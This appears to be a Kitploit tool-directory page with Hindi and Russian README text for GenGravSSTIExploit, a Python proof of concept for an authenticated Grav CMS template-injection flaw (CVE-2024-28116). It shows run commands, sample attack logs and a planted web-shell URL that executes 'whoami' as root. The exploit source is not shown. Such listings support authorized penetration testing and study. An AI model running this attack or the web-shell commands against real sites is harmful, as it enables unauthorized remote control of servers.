Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/geniuszly/gengravsstiexploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

एक PoC Python script है जो Grav CMS संस्करणों <= 1.7.44 (CVE-2024-28116) में प्रमाणित सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) कमजोरी का शोषण करती है।

रिपॉजिटरी देखें
72371 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EN

GenGravSSTIExploit एक PoC Python स्क्रिप्ट है जो Grav CMS संस्करण <= 1.7.44 (CVE-2024-28116) में एक प्रमाणित सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) कमजोरी का शोषण करती है। यह कमजोरी संपादक अनुमतियों वाले उपयोगकर्ता को दूरस्थ सर्वर पर OS कमांड निष्पादित करने की अनुमति देती है।

नोट: इस स्क्रिप्ट को Grav CMS कंसोल पर प्रमाणित होने के लिए वैध क्रेडेंशियल्स की आवश्यकता है।

विशेषताएँ

  • संपादक क्रेडेंशियल्स का उपयोग करके Grav CMS एडमिन पैनल से प्रमाणित होता है।
  • पेलोड इंजेक्ट करने के लिए CMS पर एक नया पेज बनाता है।
  • SSTI कमजोरी का लाभ उठाकर दूरस्थ OS कमांड निष्पादित करता है।

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी (pip install requests से इंस्टॉल करें)

उपयोग

  1. रिपॉजिटरी क्लोन करें

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. क्रेडेंशियल्स कॉन्फ़िगर करें

    अपने Grav CMS संपादक क्रेडेंशियल्स प्रदान करने के लिए स्क्रिप्ट को संपादित करें:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. स्क्रिप्ट चलाएँ

    स्क्रिप्ट चलाने के लिए निम्नलिखित कमांड का उपयोग करें:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: http[s]://hostname प्रारूप में लक्ष्य URL।
    • <PORT>: पोर्ट नंबर (डिफ़ॉल्ट 80)।

    उदाहरण:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. एक्सप्लॉइट के साथ इंटरेक्ट करें

    यदि एक्सप्लॉइट सफल होता है, तो आपको एक URL मिलेगा जहाँ आप OS कमांड निष्पादित कर सकते हैं:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

उदाहरण आउटपुट

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

स्क्रिप्ट प्रत्येक चरण को निष्पादित करेगी और टर्मिनल के माध्यम से आपको अपडेट प्रदान करेगी। यहाँ आप क्या देख सकते हैं:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

स्क्रिप्ट समाप्त होने के बाद, आपको इंजेक्ट किए गए पेज का लिंक दिखाई देगा। आप OS कमांड निष्पादित करने के लिए इस लिंक पर जा सकते हैं:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

निर्दिष्ट कमांड के साथ URL पर जाने से आउटपुट सीधे पेज पर प्रदर्शित होगा:

root@kitploit:~
Cmd-Output:
root

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जहाँ आपके पास स्पष्ट अनुमति है। लेखक इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।

RU

GenGravSSTIExploit — это PoC скрипт на Python , эксплуатирующий аутентифицированную уязвимость SSTI (Server-Side Template Injection) в Grav CMS версий <= 1.7.44 (CVE-2024-28116). Эта уязвимость позволяет пользователю с правами редактора выполнять команды ОС на удаленном сервере.

Примечание: Скрипт требует действительных учетных данных для авторизации в админ-панели Grav CMS.

Особенности

  • Аутентификация в админ-панели Grav CMS с использованием учетных данных редактора.
  • Создание новой страницы на CMS для инъекции полезной нагрузки.
  • Выполнение команд ОС удаленно, используя уязвимость SSTI.

Требования

  • Python 3.x
  • Библиотека requests (установить через pip install requests)

Использование

  1. Клонируйте репозиторий

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. Настройте учетные данные

    Отредактируйте скрипт и введите учетные данные редактора Grav CMS:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. Запустите скрипт

    Используйте следующую команду для запуска скрипта:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: Целевой URL в формате http[s]://hostname.
    • <PORT>: Номер порта (по умолчанию 80).

    Пример:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. Взаимодействие с эксплойтом

    Если эксплойт прошел успешно, вы получите URL, где сможете выполнить команды ОС:

    root@kitploit:~
    [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
    

Пример вывода

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

Скрипт будет выполнять каждый шаг, предоставляя вам обновления через терминал. Вот что вы можете увидеть:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

После завершения работы скрипта вы увидите сообщение со ссылкой на внедренную страницу. Вы можете перейти по этой ссылке для выполнения команд:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

Посещение URL-адреса с помощью указанной команды приведет к отображению вывода прямо на странице:

root@kitploit:~
Cmd-Output:
root

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Используйте его ответственно и только на системах, где у вас есть явное разрешение. Автор не несет ответственности за любое злоупотребление или ущерб, вызванный этим скриптом.

टूल डाउनलोड करें